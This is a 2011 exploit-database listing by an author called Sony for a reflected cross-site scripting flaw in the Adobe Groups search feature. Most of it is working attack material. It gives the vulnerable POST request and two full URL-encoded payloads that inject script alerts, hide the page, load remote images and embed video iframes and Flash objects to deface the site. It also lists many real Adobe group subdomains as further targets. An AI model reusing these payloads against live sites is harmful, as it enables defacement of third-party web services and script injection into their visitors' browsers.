Adobe Groups Cross Site Scripting

🗓️ 06 Sep 2011 00:00:00Reported by SonyType
packetstorm🔗 packetstormsecurity.com👁 23 Views
Adobe Groups Cross Site Scripting exploit from 30.08.2011, using Live HTTP Headers to inject code and targeting various Adobe group
`;)  
  
# Exploit Title: Adobe Groups Cross Site Scripting  
# Date: 30.08.2011  
# Author: Sony  
# Software Link: http://groups.adobe.com/  
# Blog: http://st2tea.blogspot.com/  
  
..................................................................  
  
Well, we can see:  
  
http://xssed.com/mirror/71488/  
  
Don't work and it's sadly..omg!  
  
But..  
  
Let's Go:  
  
http://ria.groups.adobe.com/index.cfm?event=group.search&groupid=534  
  
Use Live HTTP Headers:  
  
POST /index.cfm?event=group.search&groupid=1128  
keywords=1&lastactivity=Anytime&author=&type=  
  
=1128 keywords=  
  
John + Jane = Love  
  
1128 + keywords = our Way  
  
http://ria.groups.adobe.com/index.cfm?event=group.search&groupid=534&keywords=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28http://i53.tinypic.com/dp8jyv.jpg%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Ciframe%20width=%22560%22%20height=%22345%22%20src=%22http://www.youtube.com/embed/sFYLp-r0ZVA%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E&lastactivity=in+the+last+year&author=&type=  
  
All Adobe Groups:  
  
http://madnet.name/tools/madss/  
  
cpaug.groups.adobe.com  
cppug.groups.adobe.com  
cpug.groups.adobe.com  
creativecrew.groups.adobe.com  
creativesuitesanjose.groups.adobe.com  
csneworleans.groups.adobe.com  
cssierra.groups.adobe.com  
cswestmd.groups.adobe.com  
daaug.groups.adobe.com  
dallasae.groups.adobe.com  
dallaspremiere.groups.adobe.com  
dalpug.groups.adobe.com  
dc-metro.groups.adobe.com  
dccfug.groups.adobe.com  
dco.groups.adobe.com  
ddla.groups.adobe.com  
denverflex.groups.adobe.com  
denverlivecycle.groups.adobe.com  
derbyaug.groups.adobe.com  
desmoines.groups.adobe.com  
  
etc..  
  
So..what can we do?  
  
I don't know..let's go dance!  
  
http://nasa.groups.adobe.com/index.cfm?event=group.search&groupid=1128&keywords=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28http://th1192.photobucket.com/albums/aa321/Albertlinux/fundos/th_matrix.gif%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3COBJECT%20width=%22470%22%20height=%22353%22%3E%3CPARAM%20name=%22movie%22%20value=%22http://video.rutube.ru/7a7148f0f6c5f92ae195cccd72dff454%22%3E%3C/PARAM%3E%3CPARAM%20name=%22wmode%22%20value=%22window%22%3E%3C/PARAM%3E%3CPARAM%20name=%22allowFullScreen%22%20value=%22true%22%3E%3C/PARAM%3E%3CEMBED%20src=%22http://video.rutube.ru/7a7148f0f6c5f92ae195cccd72dff454%22%20type=%22application/x-shockwave-flash%22%20wmode=%22window%22%20width=%22470%22%20height=%22353%22%20allowFullScreen=%22true%22%20%3E%3C/EMBED%3E%3C/OBJECT%3E&lastactivity=in+the+last+year&author=&type=  
`
06 Sep 2011 00:00Current